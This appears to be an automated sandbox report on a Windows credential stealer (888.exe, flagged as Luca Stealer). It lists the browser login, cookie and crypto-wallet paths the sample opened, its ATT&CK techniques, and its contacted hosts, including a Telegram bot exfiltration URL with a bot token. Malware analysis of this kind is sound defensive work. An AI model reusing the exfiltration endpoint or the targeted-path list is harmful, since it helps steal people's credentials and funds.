              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pnlccmojcmeohlpggmfnbbiapkmbliobJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\igkpcodhieompeloncfnbekccinhapdbJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfelJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\icmkfkmjoklfhlfdkkkgpnpldkgdmhoeJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Login DataJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Tries to steal Crypto Currency Wallets
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior
              Source: C:\Users\user\Desktop\888.exeFile opened: C:\Users\user\AppData\Roaming\exodus\exodus.wallet\Jump to behavior

              Remote Access Functionality

              barindex
              Yara detected Luca Stealer
              Source: Yara matchFile source: 888.exe, type: SAMPLE
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: 0.2.888.exe.a50000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.0.888.exe.a50000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000003.1849050689.000000000131F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 888.exe PID: 7888, type: MEMORYSTR

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts31
              Windows Management Instrumentation              		1
              DLL Side-Loading              		11
              Process Injection              		1
              Masquerading              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Web Service              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Disable or Modify Tools              		LSASS Memory31
              Security Software Discovery              		Remote Desktop Protocol2
              Data from Local System              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
              Virtualization/Sandbox Evasion              		Security Account Manager1
              Process Discovery              		SMB/Windows Admin SharesData from Network Shared Drive1
              Ingress Tool Transfer              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
              Process Injection              		NTDS31
              Virtualization/Sandbox Evasion              		Distributed Component Object ModelInput Capture3
              Non-Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading              		LSA Secrets1
              Application Window Discovery              		SSHKeylogging4
              Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              File Deletion              		Cached Domain Credentials1
              System Network Configuration Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
              File and Directory Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem23
              System Information Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              888.exe53%ReversingLabsWin32.Trojan.Barys
              888.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.w3.or0%Avira URL Cloudsafe
              https://cdn.ipwhois.io/flags/us.svg0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              ipwho.is
              		108.181.61.49
              		truefalse
                		high
                s-part-0035.t-0009.t-msedge.net
                		13.107.246.63
                		truefalse
                  		high
                  api.telegram.org
                  		149.154.167.220
                  		truefalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://ac.ecosia.org/autocomplete?q=888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.drfalse
                      		high
                      https://duckduckgo.com/chrome_newtab888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.drfalse
                        		high
                        http://ipwho.is/?output=json888.exe, 00000000.00000002.1849949792.0000000001034000.00000004.00000010.00020000.00000000.sdmpfalse
                          		high
                          https://duckduckgo.com/ac/?q=888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.drfalse
                            		high
                            https://www.google.com/images/branding/product/ico/googleg_lodp.ico888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.drfalse
                              		high
                              https://api.telegram.org/bot6144496200:AAG-IIb4TPBPT1INBnZWa7iLZBVaG67I2mE/sendDocument?chat_id=-100888.exe, 00000000.00000002.1851135318.000000000448C000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.drfalse
                                  		high
                                  http://ipwho.is/?output=jsonB888.exe, 00000000.00000002.1849949792.0000000001034000.00000004.00000010.00020000.00000000.sdmpfalse
                                    		high
                                    https://docs.rs/getrandom#nodejs-es-module-support0888.exefalse
                                      		high
                                      https://docs.rs/getrandom#nodejs-es-module-support888.exefalse
                                        		high
                                        http://www.w3.or888.exefalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.drfalse
                                          		high
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.drfalse
                                            		high
                                            http://ns.adobe.888.exefalse
                                              		high
                                              https://www.ecosia.org/newtab/888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.drfalse
                                                		high
                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=888.exe, 00000000.00000003.1722779444.00000000013A4000.00000004.00000020.00020000.00000000.sdmp, Web Data.0.dr, CreditCardData.0.drfalse
                                                  		high
                                                  https://cdn.ipwhois.io/flags/us.svg888.exe, 00000000.00000003.1849050689.000000000131F000.00000004.00000020.00020000.00000000.sdmp, 888.exe, 00000000.00000002.1850227693.000000000131F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  149.154.167.220
                                                  		api.telegram.orgUnited Kingdom
                                                  		62041TELEGRAMRUfalse
                                                  108.181.61.49
                                                  		ipwho.isCanada
                                                  		852ASN852CAfalse

                                                  General Information

                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1574586
                                                  Start date and time:2024-12-13 12:39:20 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 4m 46s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:7
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:0
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:888.exe
                                                  Detection:MAL
                                                  Classification:mal80.troj.spyw.winEXE@4/15@3/2
                                                  EGA Information:
                                                  • Successful, ratio: 100%
                                                  HCA Information:Failed
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe
                                                  • Stop behavior analysis, all processes terminated

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                  • VT rate limit hit for: 888.exe

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  06:40:55API Interceptor3x Sleep call for process: powershell.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  149.154.167.220https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.comGet hashmaliciousHTMLPhisherBrowse
                                                    XClient.exeGet hashmaliciousXWormBrowse
                                                      file.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                        Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                          installer.exeGet hashmaliciousUnknownBrowse
                                                            installer.exeGet hashmaliciousUnknownBrowse
                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                  file.exeGet hashmaliciousUnknownBrowse
                                                                    TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      108.181.61.49Cracker.exeGet hashmaliciousLuca StealerBrowse
                                                                      • /?output=json

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      s-part-0035.t-0009.t-msedge.netpayload-c17f7df6-cf80-43d5-8c60-eca90366debb.exeGet hashmaliciousMetasploitBrowse
                                                                      • 13.107.246.63
                                                                      Client.exeGet hashmaliciousNjratBrowse
                                                                      • 13.107.246.63
                                                                      beacon_x64.exeGet hashmaliciousCobaltStrikeBrowse
                                                                      • 13.107.246.63
                                                                      BWCStartMSI.exeGet hashmaliciousUnknownBrowse
                                                                      • 13.107.246.63
                                                                      kiyan.exeGet hashmaliciousRedLineBrowse
                                                                      • 13.107.246.63
                                                                      AsyncClient.exeGet hashmaliciousAsyncRATBrowse
                                                                      • 13.107.246.63
                                                                      main.exeGet hashmaliciousAsyncRATBrowse
                                                                      • 13.107.246.63
                                                                      RMX.exeGet hashmaliciousRemcosBrowse
                                                                      • 13.107.246.63
                                                                      https://e.trustifi.com/#/fff2a6/34074b/38c75f/bf3fbd/0d1c47/12c665/f3cdcd/c1be48/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/d08b7b/9066d9/86c9f0/b1ff53/224fc1/c5dff5/a64e02/f00a15/3cdbea/a78615/4ddb76/30d9f7/98e1a2/9412cb/8e2651/8d4e63/9d313b/2f0213/ae3252/642e4a/6f0b2e/306b49/fd8e03/84bfef/0da4e6/6224c1/902b5e/e0d84c/badeba/3e52c1/94282a/975221/7a2e92/514659/ae5bab/957b7b/eb9e61/6942c6/d917d9/44a5ae/e58297/02048a/55f177/dca75c/c46e68/ac781c/5b787b/abcd53/568132/1d514a/5290de/d0b524/7d0cb6/e4e8bf/2ff215/1ddb69/add914/7674bb/dc5d9b/8fc829/561052/f5a816/40ee64/a0bcf5/b0cc13/8e70a5/255ef2/b24b8d/81e09f/4c70dd/5bbaa4/7ff26c/f1999b/4a2515/4a3a04/0a188eGet hashmaliciousUnknownBrowse
                                                                      • 13.107.246.63
                                                                      41a1111.hta.exeGet hashmaliciousUnknownBrowse
                                                                      • 13.107.246.63
                                                                      api.telegram.orghttps://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.comGet hashmaliciousHTMLPhisherBrowse
                                                                      • 149.154.167.220
                                                                      XClient.exeGet hashmaliciousXWormBrowse
                                                                      • 149.154.167.220
                                                                      file.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                      • 149.154.167.220
                                                                      Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                      • 149.154.167.220
                                                                      installer.exeGet hashmaliciousUnknownBrowse
                                                                      • 149.154.167.220
                                                                      installer.exeGet hashmaliciousUnknownBrowse
                                                                      • 149.154.167.220
                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                      • 149.154.167.220
                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, VidarBrowse
                                                                      • 149.154.167.220
                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                      • 149.154.167.220
                                                                      TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                      • 149.154.167.220
                                                                      ipwho.ishttps://aggttt.z4.web.core.windows.net/?bcda=00-1-234-294-2156Get hashmaliciousTechSupportScamBrowse
                                                                      • 108.181.61.49
                                                                      Loader.exeGet hashmaliciousQuasarBrowse
                                                                      • 108.181.61.49
                                                                      Hydra.ccLoader.batGet hashmaliciousUnknownBrowse
                                                                      • 108.181.61.49
                                                                      full.exeGet hashmaliciousQuasarBrowse
                                                                      • 108.181.61.49
                                                                      https://gvvc18-secondary.z15.web.core.windows.net/werrx01USAHTML/?bcda=1-844-439-9938Get hashmaliciousTechSupportScamBrowse
                                                                      • 108.181.61.49
                                                                      file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                                                      • 103.126.138.87
                                                                      TeudA4phjN.exeGet hashmaliciousQuasarBrowse
                                                                      • 103.126.138.87
                                                                      http://www.sbh.co.uk/Get hashmaliciousHTMLPhisher, TechSupportScamBrowse
                                                                      • 103.126.138.87
                                                                      file.exeGet hashmaliciousQuasarBrowse
                                                                      • 103.126.138.87
                                                                      file.exeGet hashmaliciousQuasarBrowse
                                                                      • 103.126.138.87

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      TELEGRAMRUhttps://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.comGet hashmaliciousHTMLPhisherBrowse
                                                                      • 149.154.167.220
                                                                      XClient.exeGet hashmaliciousXWormBrowse
                                                                      • 149.154.167.220
                                                                      file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                      • 149.154.167.99
                                                                      file.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                      • 149.154.167.220
                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                      • 149.154.167.99
                                                                      file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                      • 149.154.167.99
                                                                      Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                      • 149.154.167.220
                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                      • 149.154.167.99
                                                                      installer.exeGet hashmaliciousUnknownBrowse
                                                                      • 149.154.167.220
                                                                      installer.exeGet hashmaliciousUnknownBrowse
                                                                      • 149.154.167.220
                                                                      ASN852CAhttps://aggttt.z4.web.core.windows.net/?bcda=00-1-234-294-2156Get hashmaliciousTechSupportScamBrowse
                                                                      • 108.181.61.49
                                                                      Loader.exeGet hashmaliciousQuasarBrowse
                                                                      • 108.181.61.49
                                                                      arm7.nn-20241213-0355.elfGet hashmaliciousMirai, OkiruBrowse
                                                                      • 50.98.219.123
                                                                      Hydra.ccLoader.batGet hashmaliciousUnknownBrowse
                                                                      • 108.181.61.49
                                                                      full.exeGet hashmaliciousQuasarBrowse
                                                                      • 108.181.61.49
                                                                      jew.sh4.elfGet hashmaliciousUnknownBrowse
                                                                      • 75.158.230.151
                                                                      mpsl.elfGet hashmaliciousMiraiBrowse
                                                                      • 198.166.177.229
                                                                      mips.elfGet hashmaliciousMiraiBrowse
                                                                      • 142.41.252.248
                                                                      https://gvvc18-secondary.z15.web.core.windows.net/werrx01USAHTML/?bcda=1-844-439-9938Get hashmaliciousTechSupportScamBrowse
                                                                      • 108.181.61.49
                                                                      PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                      • 108.181.189.7

                                                                      JA3 Fingerprints

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      3b5074b1b5d032e5620f69f9f700ff0ehttps://opof.utackhepr.com/WE76L1u/Get hashmaliciousUnknownBrowse
                                                                      • 149.154.167.220
                                                                      taskhost.exeGet hashmaliciousXWormBrowse
                                                                      • 149.154.167.220
                                                                      XClient.exeGet hashmaliciousXWormBrowse
                                                                      • 149.154.167.220
                                                                      Loader.exeGet hashmaliciousQuasarBrowse
                                                                      • 149.154.167.220
                                                                      smb.ps1Get hashmaliciousXmrigBrowse
                                                                      • 149.154.167.220
                                                                      j87MOFviv4.lnkGet hashmaliciousUnknownBrowse
                                                                      • 149.154.167.220
                                                                      DvGZE4FU02.lnkGet hashmaliciousUnknownBrowse
                                                                      • 149.154.167.220
                                                                      j3z5kxxt52.lnkGet hashmaliciousUnknownBrowse
                                                                      • 149.154.167.220
                                                                      zpbiw0htk6.lnkGet hashmaliciousUnknownBrowse
                                                                      • 149.154.167.220
                                                                      Uniswap Sniper Bot With GUI.exeGet hashmaliciousUnknownBrowse
                                                                      • 149.154.167.220

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):64
                                                                      Entropy (8bit):1.1510207563435464
                                                                      Encrypted:false
                                                                      SSDEEP:3:NlllulPki/llllZ:NllUcylll
                                                                      MD5:D8D47FD6FA3E199E4AFF68B91F1D04A8
                                                                      SHA1:788625E414B030E5174C5BE7262A4C93502C2C21
                                                                      SHA-256:2D9AF9AB25D04D1CF9B25DB196A988CD6E4124C1B8E185B96F2AB9554F4A6738
                                                                      SHA-512:5BFD83D07DC3CB53563F215BE1D4D7206340A4C0AB06988697637C402793146D13CDDE0E27DC8301E4506553D957876AC9D7A7BF3C7431BBDD5F019C17AB0A58
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:@...e.................................^..............@..........

                                                                      C:\Users\user\AppData\Local\Temp\Cookies

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\888.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                      Category:dropped
                                                                      Size (bytes):20480
                                                                      Entropy (8bit):0.8517407251719497
                                                                      Encrypted:false
                                                                      SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO4wxeHChWEE1:TeAFawNLopFgU10XJBOaT3
                                                                      MD5:D0962B221779A756754334848DCFF184
                                                                      SHA1:22CD3B9D687216E6921553F55958449CE7ABF05D
                                                                      SHA-256:7BA5110096912E6B352060FFF79B07EA95CA114A13D3994D7814831DFAA649B8
                                                                      SHA-512:05AFC25BA53913F0685075B6EC27A2A416168CB7A6D5C869D2F3DBA06AAD88633F1A709DD51AA1EDC946FF74E6271D9D3A5652FE4E0B8F226A452FDF6BAED36F
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\CreditCardData

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\888.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1368932887859682
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/k4:MnlyfnGtxnfVuSVumEHFs4
                                                                      MD5:9A534FD57BED1D3E9815232E05CCF696
                                                                      SHA1:916474D7D073A4EB52A2EF8F7D9EF9549C0808A1
                                                                      SHA-256:7BB87D8BC8D49EECAB122B7F5BCD9E77F77B36C6DB173CB41E83A2CCA3AC391B
                                                                      SHA-512:ADE77FBBDE6882EF458A43F301AD84B12B42D82E222FC647A78E5709554754714DB886523A639C78D05BC221D608F0F99266D89165E78F76B21083002BE8AEFF
                                                                      Malicious:false
                                                                      Reputation:moderate, very likely benign file
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\History

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\888.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):159744
                                                                      Entropy (8bit):0.5394293526345721
                                                                      Encrypted:false
                                                                      SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                      MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                      SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                      SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                      SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\Login Data

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\888.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):40960
                                                                      Entropy (8bit):0.8553638852307782
                                                                      Encrypted:false
                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
